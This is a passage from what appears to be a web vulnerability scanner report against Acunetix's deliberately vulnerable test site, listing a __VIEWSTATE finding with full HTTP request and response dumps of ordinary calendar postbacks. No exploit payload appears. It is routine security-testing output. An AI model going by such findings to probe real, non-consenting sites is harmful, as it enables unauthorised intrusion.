scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:White" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8591&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAtprYgNsIZGRkJBfEZ9RpiEV1HOqjGhEefnYGOWk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLW6t28BgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCs0%2FD3LtIj8cxd%2F20vkvvZdBTt3b
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:17 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAtprYgNsIZGRkJBfEZ9RpiEV1HOqjGhEefnYGOWk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLW6t28BgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCs0/D3LtIj8cxd/20vkvvZdBTt3b" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:White" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1177 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,177 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8579&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAwZ1qd9sIZGRk5qlpwkD4AGyFEDORXSyVQRIGzq0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqg%2FWcAQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCi2jBOqEX3wLy8cWVBUhi1PwsJG3
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:19 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAwZ1qd9sIZGRk5qlpwkD4AGyFEDORXSyVQRIGzq0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqg/WcAQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCi2jBOqEX3wLy8cWVBUhi1PwsJG3" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td 